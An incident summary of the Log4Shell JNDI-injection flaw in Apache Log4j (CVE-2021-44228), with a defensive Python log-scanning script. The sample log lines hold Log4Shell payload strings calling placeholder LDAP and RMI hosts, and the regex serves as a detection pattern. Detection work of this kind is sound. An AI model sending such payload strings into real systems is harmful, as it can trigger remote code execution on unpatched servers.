Apache Software Foundation (Log4j): CVE-2021-44228 — JNDI injection in Log4j enables remote code execution
A JNDI lookup feature in the widely used Apache Log4j Java logging library allowed attackers to trigger arbitrary remote code execution by crafting log messages containing JNDI lookup strings.
2 of the 3 practices that failed in this incident are part of the Sentinel-10 — the engineering protocols Concordance flags as most degraded under AI-accelerated development.
This incident pre-dates today's AI-velocity surge. The thesis is that the same practices that failed here will fail faster under AI velocity if not actively governed.
Impact
Log4j was used in millions of Java applications including products from Apple, Amazon, Cloudflare, IBM, Microsoft, and most enterprise Java systems. CISA called it "the most serious vulnerability I have seen in my decades-long career."
Root cause (from published RCA)
Log4j 2.x supports lookups that perform JNDI substitution by default. When user-controlled data is logged, attackers can inject JNDI lookups that cause the logger to fetch and execute remote code from attacker-controlled LDAP/RMI servers. The dangerous behaviour was enabled by default with no documented warning.
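A defender can hunt for the root cause described above by scanning existing logs for JNDI lookup tokens and grouping them by the remote server they point at. The following is an added example, not code from the published RCA or from the Log4j project; the function names and the sample log lines are constructed for illustration, and the hosts use reserved documentation addresses.

```python
import re
from urllib.parse import unquote, urlsplit

# Matches a JNDI lookup token such as ${jndi:ldap://host/path}, in any letter case.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}\s]+)\}", re.IGNORECASE)

def find_jndi_lookups(line):
    """Return a (scheme, host) pair for each JNDI lookup token in one log line."""
    decoded = unquote(line)  # access logs usually store the request URL-encoded
    hits = []
    for match in JNDI_LOOKUP.finditer(decoded):
        try:
            target = urlsplit(match.group(1))
        except ValueError:  # malformed target: still record that a lookup was seen
            hits.append(("unparsed", match.group(1)))
            continue
        hits.append((target.scheme, target.hostname or ""))
    return hits

def triage(lines):
    """Map each (scheme, host) to the 1-based line numbers that reference it."""
    report = {}
    for number, line in enumerate(lines, start=1):
        for key in find_jndi_lookups(line):
            report.setdefault(key, []).append(number)
    return report

# Constructed sample input: application log lines and one web access log line.
SAMPLE_LOG = [
    "2021-12-10T09:14:02Z INFO LoginController - login failed for user=alice",
    "2021-12-10T09:14:05Z INFO LoginController - login failed for "
    "user=${jndi:ldap://collector.example.test:1389/a}",
    '203.0.113.7 - - [10/Dec/2021:09:14:09 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F192.0.2.10%2Fobj%7D HTTP/1.1" 200 512',
    "2021-12-10T09:14:11Z WARN Api - User-Agent: "
    "${JNDI:LDAP://collector.example.test:1389/b}",
]

if __name__ == "__main__":
    for (scheme, host), numbers in sorted(triage(SAMPLE_LOG).items()):
        print(f"{scheme:8} {host:28} lines {numbers}")
```

A hit shows only that a lookup string reached the log; whether the logger resolved it depends on the Log4j version and configuration of the application that wrote the line.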